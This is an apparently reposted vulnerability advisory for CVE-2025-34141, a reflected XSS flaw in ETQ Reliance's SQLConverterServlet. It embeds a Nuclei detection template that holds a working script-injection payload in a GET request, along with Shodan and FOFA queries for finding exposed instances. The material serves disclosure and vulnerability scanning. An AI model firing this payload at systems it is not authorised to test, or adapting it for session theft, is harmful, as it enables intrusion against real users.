ETQ Reliance Reflected XSS via SQLConverterServlet Vulnerability

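Vulnerability information

Vulnerability name: ETQ Reliance Reflected XSS via SQLConverterServlet Vulnerability

Vulnerability ID:

  • CVE: CVE-2025-34141

Vulnerability type: Cross-site scripting

Severity: Medium

Description: ETQ Reliance is an enterprise quality management software product widely used in manufacturing and service industries to track and manage quality processes. The SQLConverterServlet component in the software's CG (legacy) platform has a reflected cross-site scripting (XSS) vulnerability. The root cause is that the SQLConverterServlet component handles user input improperly and does not correctly filter or escape malicious script. An attacker can craft a special link and lure a user into clicking it, causing arbitrary JavaScript to execute in the user's browser session. Because the vulnerability requires user interaction to trigger, its exploitation complexity is relatively high. An attacker who successfully exploits it can hijack sessions or perform unauthorized actions, but it does not directly affect system availability. The vulnerability is fixed in ETQ Reliance version SE.2025.1; users are advised to upgrade to that version or later to avoid potential security risk.

Vendor: etq

Product: reliance

Affected versions: * < SE.2025.1

Search syntax: html:"ETQ Reliance"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/c53b5833df8ef3c659312004bb14ffc5279b5eec/http%2Fcves%2F2025%2FCVE-2025-34141.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC details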


id: CVE-2025-34141

info:
  name: ETQ Reliance - Reflected XSS via SQLConverterServlet
  author: slcyber,pdresearch
  severity: medium
  description: |
    A reflected cross-site scripting (XSS) vulnerability exists in ETQ Reliance CG (legacy) platform within the SQLConverterServlet component. This vulnerability requires user interaction, such as clicking a crafted link, and may result in execution of unauthorized scripts in the user's context. The affected servlet was unnecessarily exposed to authenticated users and has since been disabled in version SE.2025.1.
  impact: |
    Successful exploitation allows attackers to execute arbitrary JavaScript in the context of an authenticated user's browser session, potentially leading to session hijacking or unauthorized actions.
  remediation: |
    Upgrade to ETQ Reliance version SE.2025.1 or later where the SQLConverterServlet has been disabled.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34141
    - https://slcyber.io/assetnote-security-research-center/how-we-accidentally-discovered-a-remote-code-execution-vulnerability-in-etq-reliance/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-34141
    cwe-id: CWE-79
    cpe: cpe:2.3:a:etq:reliance:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: etq
    product: reliance
    shodan-query: 'html:"ETQ Reliance"'
    fofa-query: 'body="ETQ Reliance"'
  tags: cve,cve2025,etq,reliance,xss,reflected-xss

flow: |
  http(1)
  if(template.path){
    http(2)
  } else {
    set("path","reliance")
    http(2)
  }

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: header
        internal: true
        name: path
        group: 1
        regex:
          - 'Location: https?://.*?/(.*?)/'

  - raw:
      - |
        GET /reliance/SQLConverterServlet?MySQLStm=%3C/textarea%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - '</textarea><img src=x onerror=alert(document.domain)>'
          - 'You have to start the ENGINE application before using this form.'
        condition: and


http://example.com/2025/07/23/github_3457363991/
Author: lianccc
Published: July 23, 2025